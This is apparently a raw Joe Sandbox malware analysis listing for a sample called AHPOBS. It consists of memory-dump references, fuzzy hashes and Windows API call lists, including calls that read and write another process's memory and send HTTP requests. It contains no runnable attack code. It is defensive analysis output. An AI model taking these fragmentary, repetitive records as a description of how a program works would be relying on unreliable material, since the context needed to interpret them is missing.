                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                      • String ID:
                                      • API String ID: 1856069659-0
                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004478E2
                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                      • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CursorMenuPopupTrack$Proc
                                      • String ID:
                                      • API String ID: 1300944170-0
                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                      • GetCursorPos.USER32(?), ref: 004479D7
                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 1822080540-0
                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                      APIs
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                        • Part of subcall function 00440D98: SendMessageW.USER32(00B31B98,000000F1,00000000,00000000), ref: 00440E6E
                                        • Part of subcall function 00440D98: SendMessageW.USER32(00B31B98,000000F1,00000001,00000000), ref: 00440E9A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$EnableMessageSend$LongShow
                                      • String ID:
                                      • API String ID: 142311417-0
                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00445879
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                      • _wcslen.LIBCMT ref: 004458FB
                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                      • String ID:
                                      • API String ID: 3087257052-0
                                      • Opcode ID: 361cacf42ac9feaf17efa0cc57a42f9ac02e5fc726f21fc3ca83feaa1aa35840
                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                      • Opcode Fuzzy Hash: 361cacf42ac9feaf17efa0cc57a42f9ac02e5fc726f21fc3ca83feaa1aa35840
                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                      • BeginPath.GDI32(?), ref: 0044723D
                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Object$Select$BeginCreateDeletePath
                                      • String ID:
                                      • API String ID: 2338827641-0
                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$Icon
                                      • String ID:
                                      • API String ID: 4023252218-0
                                      • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                      • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                      • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                      APIs
                                      • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyObject$IconMessageSendWindow
                                      • String ID:
                                      • API String ID: 1489400265-0
                                      • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                      • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                      • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyWindow.USER32(?), ref: 00455728
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                      • String ID:
                                      • API String ID: 1042038666-0
                                      • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                      • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                      • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                      APIs
                                      • __getptd.LIBCMT ref: 0041780F
                                        • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                        • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                      • __getptd.LIBCMT ref: 00417826
                                      • __amsg_exit.LIBCMT ref: 00417834
                                      • __lock.LIBCMT ref: 00417844
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                      • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                      • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                      APIs
                                        • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                      • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                        • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                        • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                      • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                        • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                      • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                      • ExitThread.KERNEL32 ref: 004151ED
                                      • __freefls@4.LIBCMT ref: 00415209
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                      • String ID:
                                      • API String ID: 4247068974-0
                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                      Similarity
                                      • API ID:
                                      • String ID: )$U$\
                                      • API String ID: 0-3705770531
                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                      • CoUninitialize.OLE32 ref: 0046E53D
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                      Similarity
                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 708495834-557222456
                                      • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                      • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                      APIs
                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$]$h
                                      • API String ID: 4104443479-3262404753
                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Similarity
                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3705125965-3916222277
                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                      APIs
                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
